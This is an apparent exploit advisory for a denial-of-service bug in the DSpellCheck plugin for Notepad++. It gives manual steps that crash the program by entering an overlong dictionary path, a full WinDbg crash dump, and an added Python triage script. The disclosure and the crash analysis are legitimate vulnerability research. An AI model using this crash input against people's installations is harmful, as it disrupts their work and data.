# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
# Vulnerable plugin version: DSpellCheck v1.2.12.0
# Tested on: Windows XP SP3 EN, Notepad++ 6.5.4
POC:
1) Install Notepad++.
2) Open the Plugins tab, select DSpellCheck and click on settings.
3) In the "hunspell dictionaries path" field, enter a very long string, say 80000 A's, and click on "apply".
##########################################################
(cf8.4f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00690044 ebx=00000000 ecx=00000294 edx=01f56070 esi=01f56060 edi=00000000
eip=7c919fca esp=01d0ed74 ebp=01d0ede8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlpWaitForCriticalSection+0x5b:
7c919fca ff4010 inc dword ptr [eax+10h] ds:0023:00690054=bc5d0050
####################################################
FAULTING_IP:
ntdll!RtlpWaitForCriticalSection+5b
7c919fca ff4010 inc dword ptr [eax+10h]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 7c919fca (ntdll!RtlpWaitForCriticalSection+0x0000005b)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00690054
Attempt to write to address 00690054
FAULTING_THREAD: 000004f8
PROCESS_NAME: notepad++.exe
.
FAULTING_MODULE: 7c900000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP: 52c4419f
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 00690054
WRITE_ADDRESS: 00690054
FOLLOWUP_IP:
DSpellCheck!setInfo+577f5
012f4cb5 59 pop ecx
CRITICAL_SECTION: 00f56060 -- (!cs -s 00f56060)
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_WRONG_SYMBOLS
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE
DEFAULT_BUCKET_ID: STRING_DEREFERENCE
LAST_CONTROL_TRANSFER: from 7c901046 to 7c919fca
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
01d0ede8 7c901046 00f56060 012feb19 01f56060 ntdll!RtlpWaitForCriticalSection+0x5b
01d0ee00 012f4cb5 00000013 012f8787 00000003 ntdll!RtlEnterCriticalSection+0x46
01d0ee48 012f15f0 908eab95 01654af8 00000000 DSpellCheck!setInfo+0x577f5
01d0ee7c 012f166b 01f54058 0130e360 00000040 DSpellCheck!setInfo+0x54130
01d0ee8c 012aecaa 01f54058 0130e360 01f56056 DSpellCheck!setInfo+0x541ab
01d0ee90 01f54058 0130e360 01f56056 00000000 DSpellCheck!setInfo+0x117ea
01d0ee94 0130e360 01f56056 00000000 016549a8 0x1f54058
01d0ee98 01f56056 00000000 016549a8 00000000 DSpellCheck!setInfo+0x70ea0
01d0ee9c 00000000 016549a8 00000000 00000000 0x1f56056
SYMBOL_STACK_INDEX: 2
SYMBOL_NAME: DSpellCheck!setInfo+577f5
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: DSpellCheck
IMAGE_NAME: DSpellCheck.dll
STACK_COMMAND: ~4s ; kb
BUCKET_ID: WRONG_SYMBOLS
FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_DSpellCheck.dll!setInfo
Followup: MachineOwner
####################################################
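Added example (not part of the original advisory): a small triage script that reads the analysis fields shown above and reports the access type, the module the debugger attributes the fault to, and the bucket string to deduplicate on. The function names parse_analyze and triage are hypothetical, and SAMPLE is an excerpt built from the values on this page.

```python
import re

# Excerpt of the analysis output above; values are copied from the page.
SAMPLE = """\
FAULTING_IP:
ntdll!RtlpWaitForCriticalSection+5b
7c919fca ff4010 inc dword ptr [eax+10h]
ExceptionCode: c0000005 (Access violation)
Parameter[0]: 00000001
Parameter[1]: 00690054
FOLLOWUP_IP:
DSpellCheck!setInfo+577f5
012f4cb5 59 pop ecx
BUCKET_ID: WRONG_SYMBOLS
FAILURE_BUCKET_ID: STRING_DEREFERENCE_c0000005_DSpellCheck.dll!setInfo
"""

KEY = re.compile(r"^([A-Za-z_]+(?:\[\d+\])?):\s*(.*)$")
# Parameter[0] of an access violation: 0 = read, 1 = write, 8 = DEP (execute)
ACCESS = {0: "read", 1: "write", 8: "execute"}

def parse_analyze(text):
    """Return {key: value}; a key with no inline value takes the next line."""
    fields, pending = {}, None
    for line in map(str.strip, text.splitlines()):
        m = KEY.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
            pending = None if m.group(2) else m.group(1)
        elif pending and line:
            fields[pending], pending = line, None
    return fields

def triage(fields):
    """Summarise a crash for deduplication and module attribution."""
    return {
        "exception": fields["ExceptionCode"].split()[0],
        "access": ACCESS.get(int(fields["Parameter[0]"], 16), "unknown"),
        "address": fields["Parameter[1]"],
        "crashed_in": fields["FAULTING_IP"].split("!")[0],  # where it faulted
        "blame": fields["FOLLOWUP_IP"].split("!")[0],  # debugger's followup module
        # WRONG_SYMBOLS: symbols did not load, so symbol+offset names are unreliable
        "symbols_reliable": "WRONG_SYMBOLS" not in fields.get("BUCKET_ID", ""),
        "dedup_key": fields["FAILURE_BUCKET_ID"],
    }

if __name__ == "__main__":
    for key, value in triage(parse_analyze(SAMPLE)).items():
        print(f"{key}: {value}")
```

The fault lands inside ntdll, but the followup frame points at the plugin DLL, which is why the summary keeps "crashed_in" and "blame" as separate fields.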